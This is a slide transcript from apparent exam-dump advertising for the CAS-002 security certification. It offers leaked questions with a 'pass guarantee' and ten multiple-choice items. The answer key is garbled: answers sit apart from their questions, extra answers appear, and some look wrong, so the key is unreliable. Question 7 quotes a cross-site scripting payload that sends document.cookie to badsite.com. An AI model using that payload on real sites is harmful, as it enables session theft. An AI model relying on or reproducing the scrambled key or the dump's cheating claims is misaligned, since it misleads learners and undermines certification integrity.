Examcollectionvce CAS-002 Questions Answers

Views:
 
Category: Education
     
 

Presentation Description

Examsleader provides you the 100% real and up-to-date questions answers becuase it is the only leading brand in certification industry. we guarntee you will pass your exam in first try.All the answers verified by professionals.Just visit our site and download the exam http://www.examcollectionvce.com/vce-CAS-002.html

Comments

Presentation Transcript

slide 1:

http://www.examcollectionvce.com/vce-CAS-002.html http://www.examcollectionvce.com/vce-CAS-002.html CAS-002 Exam in Just 24 Hours

slide 2:

http://www.examcollectionvce.com/vce-CAS-002.html An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this A. Access control lists B. SELinux C. IPtables firewall D. HIPS Company ABCs SAN is nearing capacity and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN A. Enable multipath to increase availability B. Enable deduplication on the storage pools C. Implement snapshots to reduce virtual disk size D. Implement replication to offsite datacenter A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem QUESTION 1: QUESTION 2: QUESTION 3: Answer: B Answer: B

slide 3:

http://www.examcollectionvce.com/vce-CAS-002.html A. Refuse LM and only accept NTLMv2 B. Accept only LM C. Refuse NTLMv2 and accept LM D. Accept only NTLM Joe a hacker has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victims privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue A. Integer overflow B. Click-jacking C. Race condition D. SQL injection E. Use after free F. Input validation A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques if implemented in the code would be the MOST effective in protecting the fields from malformed input A. Client side input validation B. Stored procedure C. Encrypting credit card details QUESTION 4: QUESTION 5: Answer: B Answer: E

slide 4:

http://www.examcollectionvce.com/vce-CAS-002.html D. Regular expression matching A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action A. Investigate the network traffic and block UDP port 3544 at the firewall B. Remove the system from the network and disable IPv6 at the router C. Locate and remove the unauthorized 6to4 relay from the network D. Disable the switch port and block the 2001::/32 traffic at the firewall A security administrator notices the following line in a servers security log: input namecredentials typeTEXT value" +request.getParameterscriptdocument.locationhttp://badsite.com/qdocume nt.cookie/scri pt + " The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack A. WAF B. Input validation C. SIEM D. Sandboxing E. DAM QUESTION 6: QUESTION 7: Answer: D Answer: A

slide 5:

http://www.examcollectionvce.com/vce-CAS-002.html A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs which of the following trusted system concepts can be implemented A. Software-based root of trust B. Continuous chain of trust C. Chain of trust with a hardware root of trust D. Software-based trust anchor with no root of trust An organization is concerned with potential data loss in the event of a disaster and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure A. Replicate NAS changes to the tape backups at the other datacenter. B. Ensure each server has two HBAs connected through two routes to the NAS. C. Establish deduplication across diverse storage paths. D. Establish a SAN that replicates between datacenters. QUESTION 8: QUESTION 9: Answer: A Answer: C Answer: D

slide 6:

http://www.examcollectionvce.com/vce-CAS-002.html An application present on the majority of an organizations 1000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue A. Deploy custom HIPS signatures to detect and block the attacks. B. Validate and deploy the appropriate patch. C. Run the application in terminal services to reduce the threat landscape. D. Deploy custom NIPS signatures to detect and block the attacks. QUESTION 10: Answer: B

slide 7:

http://www.examcollectionvce.com/vce-CAS-002.html 100 Money Back Guarantee 100 Latest Examcollection 100 Exam Passing Guarantee Answers verified By Experts Full Course coverage

slide 8:

http://www.examcollectionvce.com/vce-CAS-002.html Complete file from here: http://www.examcollectionvce.com/vce-CAS-002.html

authorStream Live Help